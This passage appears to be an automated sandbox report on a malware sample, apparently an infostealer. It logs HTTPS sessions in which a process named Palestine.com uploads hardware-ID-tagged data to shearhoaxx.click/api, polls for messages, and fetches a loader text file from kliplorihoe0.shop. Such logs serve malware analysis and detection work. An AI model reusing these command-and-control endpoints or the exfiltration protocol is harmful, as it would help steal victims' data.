                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=msuljjk135e0o73cvo1vkt3sjn; expires=Fri, 18 Apr 2025 03:22:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLp5ar8tr%2Bwu7BOroFeprxcTW%2FLlPPFWqG9rrGe5lBEV6e8a%2FmZvxes%2FyipJgER9GwEuz%2BICLaiC%2BD2U26usqWQq9OAl6zZvg%2Fy12tQK1H%2Fb%2B0WH8YRdO0eh2FcCWEaIP%2FJ9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675ccf7db3424f-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1682&rtt_var=643&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=16003&delivery_rate=1683967&cwnd=233&unsent_bytes=0&cid=573ad9c3a2e09d84&ts=842&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:35:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.1649705172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:39 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=9Y4G6U2XR1EUR4GB30P
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 20426
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:39 UTC15331OUTData Raw: 2d 2d 39 59 34 47 36 55 32 58 52 31 45 55 52 34 47 42 33 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 39 59 34 47 36 55 32 58 52 31 45 55 52 34 47 42 33 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 59 34 47 36 55 32 58 52 31 45 55 52 34 47 42 33 30 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38
                                                                                                                                                                                                                                            Data Ascii: --9Y4G6U2XR1EUR4GB30PContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--9Y4G6U2XR1EUR4GB30PContent-Disposition: form-data; name="pid"3--9Y4G6U2XR1EUR4GB30PContent-Disposition: form-data; name="lid"Dvh8ui--88
                                                                                                                                                                                                                                            2024-12-23 09:35:39 UTC5095OUTData Raw: d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 60 14 2c 6c fa 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: &7~`aO`,li`M?lrQMn 64
                                                                                                                                                                                                                                            2024-12-23 09:35:40 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=l3d6ljva64dmog21hd5dd13nf1; expires=Fri, 18 Apr 2025 03:22:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYEwSISHgjAxhf7DpZlwp4%2BgGxEmS6gAcNCnDstco0Hh71DFUFik7sWM0cRSqC1jhTEDinCLq6qOj8mSd3Vz8BHXplHDb0eJ3evfy0rND1OR7a6BaI1QgmJZ5zcY%2Bm%2F22M7B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675cdebd80c33b-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1539&min_rtt=1501&rtt_var=590&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21389&delivery_rate=1945369&cwnd=171&unsent_bytes=0&cid=25e33a714cff89d4&ts=941&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:35:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.1649706172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:41 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=X73TKVFD5WM1B2
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1210
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:41 UTC1210OUTData Raw: 2d 2d 58 37 33 54 4b 56 46 44 35 57 4d 31 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 58 37 33 54 4b 56 46 44 35 57 4d 31 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 37 33 54 4b 56 46 44 35 57 4d 31 42 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 58 37 33 54 4b 56 46 44 35 57
                                                                                                                                                                                                                                            Data Ascii: --X73TKVFD5WM1B2Content-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--X73TKVFD5WM1B2Content-Disposition: form-data; name="pid"1--X73TKVFD5WM1B2Content-Disposition: form-data; name="lid"Dvh8ui--888--X73TKVFD5W
                                                                                                                                                                                                                                            2024-12-23 09:35:42 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=m5uskpkljlen35dpri3i0sb3g5; expires=Fri, 18 Apr 2025 03:22:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0RBH%2Bl%2FpaUzBmB7mZUzAA9%2Fj9Rp6A6vytH38c9EZmhw5eyE8Qy8kfuxIzjFNAPcKQcrwqDS6axL4gBwugjSBhIsvxqgxq5%2FYqhmfQYa6nRoZm0itvctuebZDmGbTwLgDqLU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675ced9c700f51-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1486&rtt_var=575&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2123&delivery_rate=1872995&cwnd=204&unsent_bytes=0&cid=89bca8696cfde6ad&ts=819&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:35:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.1649707172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:44 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=V7UNCIOLTQBFB
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 57845
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:44 UTC15331OUTData Raw: 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45 0d 0a 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 76 68 38 75 69 2d 2d 38 38 38 0d 0a 2d 2d 56 37 55 4e 43 49 4f 4c 54 51 42 46 42
                                                                                                                                                                                                                                            Data Ascii: --V7UNCIOLTQBFBContent-Disposition: form-data; name="hwid"6E31A45A7B5F2CA1C8BA21E021A8AA6E--V7UNCIOLTQBFBContent-Disposition: form-data; name="pid"1--V7UNCIOLTQBFBContent-Disposition: form-data; name="lid"Dvh8ui--888--V7UNCIOLTQBFB
                                                                                                                                                                                                                                            2024-12-23 09:35:44 UTC15331OUTData Raw: e3 c0 70 ca 89 6c ce a5 93 d9 85 f4 79 88 d2 0c 3a b6 47 b5 8a 31 e4 96 db 98 84 9a e0 71 41 b1 dc 31 cc 12 eb d3 1d 2e 90 74 df d4 2e 27 8d 10 52 90 18 ba 3f f1 02 ce be 6a b8 5d 12 a6 fb c0 57 69 9a 95 69 cd 1c 0c 48 10 e8 bd f7 ce 71 34 f0 d3 66 a5 00 4a 54 f0 6a 5b 32 a5 4f 2e 8d 67 45 ae 9a 77 56 73 b7 1b 37 2c 3b d0 40 ff da 8d f1 0d e2 cd 0c 52 0f eb d5 b5 9c 6b ac 1b df 8f b3 7e ba 31 b9 e6 a7 6a 7d ab e3 e6 d5 0f c3 9c ac c4 35 7d 56 bf 09 e3 bd a5 25 af 59 c5 84 4c 86 d0 ef 39 80 f4 9c 18 13 ab fd e7 89 7b 26 2f 1a ab b9 73 ed 9b 73 4e f4 4d f7 42 cb 22 c2 9e e9 d6 91 62 7e cf e9 04 5c 76 d9 08 ff 49 12 a6 ad d5 eb f7 dd 5e a6 88 fe e9 be 0c 6e 53 80 de b6 fc 96 f4 a9 4e c8 23 c2 bc 0d 6a e7 d2 a3 28 b8 3e fb 17 d1 13 b3 ec 87 e6 f2 32 65 c5 70
                                                                                                                                                                                                                                            Data Ascii: ply:G1qA1.t.'R?j]WiiHq4fJTj[2O.gEwVs7,;@Rk~1j}5}V%YL9{&/ssNMB"b~\vI^nSN#j(>2ep
                                                                                                                                                                                                                                            2024-12-23 09:35:44 UTC15331OUTData Raw: 84 6e af 1d 8d c7 5d 8f f3 e2 82 b6 d9 64 2a cc dd 65 4a 77 f8 dd 54 38 98 f6 75 7b e5 2a 76 9a dc 9c 52 3f 69 88 cb 64 75 aa ba 0d b9 77 4c cf 5e cc cf 68 58 93 5e 90 70 ac 0a c0 2f 51 5d fe 91 9e 93 62 44 ba 2f 73 f3 47 5b 10 81 cc b2 03 34 9f b6 c2 f8 4d 8c 9c 45 68 aa 51 de ef 81 d1 ff 67 60 97 c1 81 61 3f f9 cf 7c 12 81 aa e7 bc 65 72 33 c2 c0 a6 3f 73 c2 5a 22 c6 12 d5 1b 88 b0 96 d8 a9 81 d6 90 4d 49 f5 a9 0b b4 d3 c8 28 ff 96 4c ed 9c 47 06 73 a7 dd 5f 5a d4 d9 ea dc a6 44 bb 2f 5e 4b 0c 63 2b 8f 11 10 46 c5 fb 59 9c 48 30 41 38 5f 2e 53 c4 eb 27 7b 70 f0 f1 cc 89 46 3f 2d 0d 8a d9 e1 c9 52 c3 e4 d0 4e 13 20 f7 67 be 55 73 35 b3 6e 1b e7 10 f4 ae f5 6a 3e 5d f2 c7 90 c9 2f 15 57 cc 2c 87 15 c6 09 8a d6 e8 84 22 0c 6a 41 55 0f a2 50 3a 82 23 df c7
                                                                                                                                                                                                                                            Data Ascii: n]d*eJwT8u{*vR?iduwL^hX^p/Q]bD/sG[4MEhQg`a?|er3?sZ"MI(LGs_ZD/^Kc+FYH0A8_.S'{pF?-RN gUs5nj>]/W,"jAUP:#
                                                                                                                                                                                                                                            2024-12-23 09:35:44 UTC11852OUTData Raw: 47 16 a0 49 13 ee 88 e6 c8 b8 5b 48 36 3a 68 14 ba 25 39 d9 21 4b b6 08 0c f6 80 9c ea c6 34 cd 18 59 de 14 48 e2 e2 ad 31 69 0a 31 49 49 97 73 0d 0a a3 a7 a7 ad 1f ff 8b 77 30 81 d9 06 33 e0 7d 47 dc 80 7c 55 33 fe 43 38 8e cf 5f 9d 76 44 00 3d 10 a1 07 b7 05 ae 55 90 cd e5 97 3b 93 07 99 50 82 88 11 58 cd 81 40 d1 2a 98 a4 0d 8f 48 70 c1 15 47 0a e9 e1 94 3b bb 06 8b c0 a3 46 e8 7d 4b a0 57 90 e4 85 1d 17 ae f1 5a 89 09 0f a7 53 d7 d6 4e 64 12 d4 7f cb 58 04 61 fc ab c0 1d 52 b8 d9 80 f2 ee 00 1e dd 52 da 26 20 45 a7 e7 c7 45 67 d0 ad 91 8d bf ab 2f 06 21 ff 9b f4 c2 ce 0b b4 f0 46 01 74 9f 2c 80 e4 db 83 80 52 f3 66 b2 94 02 99 1e b0 ec 68 93 e0 42 67 a8 c7 de 20 b7 bc 5c 4e 9a 1d d2 27 c9 50 2a 71 10 b7 5a a1 82 44 c7 09 a4 59 b9 d3 98 40 5b 82 70 2c
                                                                                                                                                                                                                                            Data Ascii: GI[H6:h%9!K4YH1i1IIsw03}G|U3C8_vD=U;PX@*HpG;F}KWZSNdXaRR& EEg/!Ft,RfhBg \N'P*qZDY@[p,
                                                                                                                                                                                                                                            2024-12-23 09:35:46 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=h3q26sriaetta0qlk47a44oc91; expires=Fri, 18 Apr 2025 03:22:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQQp4pdPJVu%2Fvj8qUGmB3FCeWZ96ZWlspT1Azs9z9hjFfIi8uwGHgL%2FTDIyssA55KEnBmTfhRhQwC9EUxu8jLHj%2Fm6YPqktRdsg8UAxh4zK1gVLZ5U4u5TVy%2FqSj%2BKHbjuLk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d008d4a0f9d-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1469&rtt_var=572&sent=31&recv=63&lost=0&retrans=0&sent_bytes=2841&recv_bytes=58912&delivery_rate=1877813&cwnd=193&unsent_bytes=0&cid=a0a45cb37c1232aa&ts=1665&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2024-12-23 09:35:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.1649708172.67.129.494436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:47 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 80
                                                                                                                                                                                                                                            Host: shearhoaxx.click
                                                                                                                                                                                                                                            2024-12-23 09:35:47 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 38 38 38 26 6a 3d 26 68 77 69 64 3d 36 45 33 31 41 34 35 41 37 42 35 46 32 43 41 31 43 38 42 41 32 31 45 30 32 31 41 38 41 41 36 45
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=Dvh8ui--888&j=&hwid=6E31A45A7B5F2CA1C8BA21E021A8AA6E
                                                                                                                                                                                                                                            2024-12-23 09:35:48 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=e70mmh0u39llni4vdb0rle07nb; expires=Fri, 18 Apr 2025 03:22:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PsQHmYuQpQyGW0UmzCJga0J%2FfW9g1SqTUa3tLv13C9650b0jVPxlb9kGqySX3%2B9ZznVrvGDDdq2nD5GjQyJKCvDgtbKYf%2Bv3aYQ%2FdTRa%2B2SpCqHdAxf7O0bVIxbYNspQJQDi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f675d135bcf4262-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1686&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=980&delivery_rate=1659090&cwnd=190&unsent_bytes=0&cid=1bed83e772de2a25&ts=1064&x=0"
                                                                                                                                                                                                                                            2024-12-23 09:35:48 UTC230INData Raw: 65 30 0d 0a 6a 6a 43 6d 4d 66 61 2b 55 73 31 32 38 4b 72 42 31 58 69 49 70 43 42 6e 49 4b 6c 38 68 51 49 31 43 45 46 4c 4e 66 47 36 65 51 7a 56 53 34 52 45 31 49 52 77 70 51 4b 45 32 72 4c 76 4a 4b 66 34 44 77 78 4d 77 41 7a 70 62 55 64 68 4b 53 52 51 77 5a 51 4b 5a 4f 46 41 2b 68 36 66 30 43 61 53 46 5a 7a 61 6e 72 6b 63 2b 76 74 51 42 6b 36 48 43 50 31 32 46 79 52 6a 4c 55 48 54 67 45 73 67 72 46 57 45 43 38 66 44 66 72 5a 55 68 59 6a 37 39 78 44 38 30 46 41 55 47 76 56 54 32 53 31 47 5a 43 34 2f 51 70 44 55 48 69 4c 74 58 38 74 74 32 64 67 37 6f 52 4f 73 68 5a 47 30 46 75 66 57 51 51 4e 50 68 78 6e 39 5a 78 63 6b 59 79 31 42 30 34 42 4a 49 4b 78 56 68 41 76 47 77 77 38 3d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: e0jjCmMfa+Us128KrB1XiIpCBnIKl8hQI1CEFLNfG6eQzVS4RE1IRwpQKE2rLvJKf4DwxMwAzpbUdhKSRQwZQKZOFA+h6f0CaSFZzanrkc+vtQBk6HCP12FyRjLUHTgEsgrFWEC8fDfrZUhYj79xD80FAUGvVT2S1GZC4/QpDUHiLtX8tt2dg7oROshZG0FufWQQNPhxn9ZxckYy1B04BJIKxVhAvGww8=
                                                                                                                                                                                                                                            2024-12-23 09:35:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.1649709172.67.182.1354436176C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC211OUTGET /int_clp_ldr_pan.txt HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: kliplorihoe0.shop
                                                                                                                                                                                                                                            2024-12-23 09:35:50 UTC905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:35:50 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                            Content-Length: 10013
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            ETag: "7097d81386f596e08a7df136f7b5b3c3"
                                                                                                                                                                                                                                            Last-Modified: Wed, 11 Dec 2024 21:20:51 GMT
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
